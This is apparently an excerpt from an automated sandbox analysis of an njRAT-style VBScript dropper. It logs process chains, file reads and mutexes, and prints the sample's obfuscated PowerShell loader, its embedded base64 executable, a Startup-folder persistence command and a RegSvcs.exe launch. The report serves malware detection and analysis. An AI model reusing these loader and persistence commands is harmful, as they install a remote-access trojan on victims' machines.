'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\Desktop\NJratccccassssG2.00.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$LHgK = 'TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B4CKBc?? ?? ?? oqHgIoG?? ?? ?? Ciqmcxk?? ?? ?? q?? ?? Q?? ?? BHMa?? ?? ?? Kg?? I?? ?? ?? RzGw?? ?? Co?? D?? ?? ?? Ecxw?? ?? ?? q?? B?? ?? ?? BCoufgE?? ?? ?? RvHQ?? ?? CioufgI?? ?? ?? RvHg?? ?? CioufgM?? ?? ?? RvHw?? ?? CioufgQ?? ?? ?? RvI?? ?? ?? CirGfgU?? ?? ?? QUKCE?? ?? ?? osHnIB?? ?? Bw0?? U?? ?? ?? IoIg?? ?? Cm8j?? ?? ?? KcyQ?? ?? ?? q?? BQ?? ?? BH4F?? ?? ?? EKhp+Bg?? ?? BCoe?? o?? G?? ?? ?? EKlZzD?? ?? ?? Bigl?? ?? ?? Kd?? Y?? ?? ?? K?? Bw?? ?? BCoe?? igm?? ?? ?? KKhp+Bw?? ?? BCoaK?? 0?? ?? ?? YqHgIoJw?? ?? Cio?? Ez?? H?? Lc?? ?? ?? ?? B?? ?? ?? Rcic?? ?? H?? Kcyg?? ?? ?? olKCk?? ?? ?? pvKg?? ?? CgYoKw?? ?? Cm8s?? ?? ?? KCwcoKw?? ?? CgsHcn8?? ?? HByhQ?? ?? cG8t?? ?? ?? KC3Mo?? ?? ?? K?? igr?? ?? ?? KKCw?? ?? ?? oMCCgr?? ?? ?? KDHKJ?? ?? BwKCs?? ?? ?? oNCXLP?? ?? BwKCs?? ?? ?? ooLg?? ?? Cg0oLw?? ?? CgcoM?? ?? ?? Cm8x?? ?? ?? Kcuc?? ?? HBvMg?? ?? CnIL?? Q
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs')

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Documents\20220221

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_czz05exg.e0h.ps1

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winVBS@26/15@10/5

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\4c6c9a1bbdc34e6ebe
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5524:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4960:120:WilError_01

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\NJratccccassssG2.00.vbs"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source:	Binary string: e.pdb source: powershell.exe, 00000018.00000003.382609842.000001976081F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.403084712.000001976081F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ib.pdbCk source: powershell.exe, 00000018.00000002.403195364.0000019760B80000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automationlib.pdb/E source: powershell.exe, 00000018.00000003.382609842.000001976081F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.403084712.000001976081F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\Hacking\Crypters Modding\ClassLibrary3\ClassLibrary3\obj\Release\lpOUplMp.pdb source: powershell.exe, 00000010.00000002.354455208.000002164DC03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.357567873.0000021665E70000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: jICudHOL.pdb source: powershell.exe, 00000010.00000002.354839665.000002164DEDA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.357618096.0000021665FB0000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: .Run("cmd.exe /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Co", "0", "true");sjGc = StrReverse(hqWU)NUPN = Replace(hqWU ,TSXl, Ubem)sjGc = StrReverse(hqWU)NUPN = Replace(hqWU ,TSXl, Ubem)NUPN = Replace(hqWU ,TSXl, Ubem)IWshShell3.CurrentDirectory();IHost.ScriptName();IWshShell3.Run("cmd.exe /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Co", "0", "true");IWshShell3.Run("powershell -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwB", "0", "false")

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?
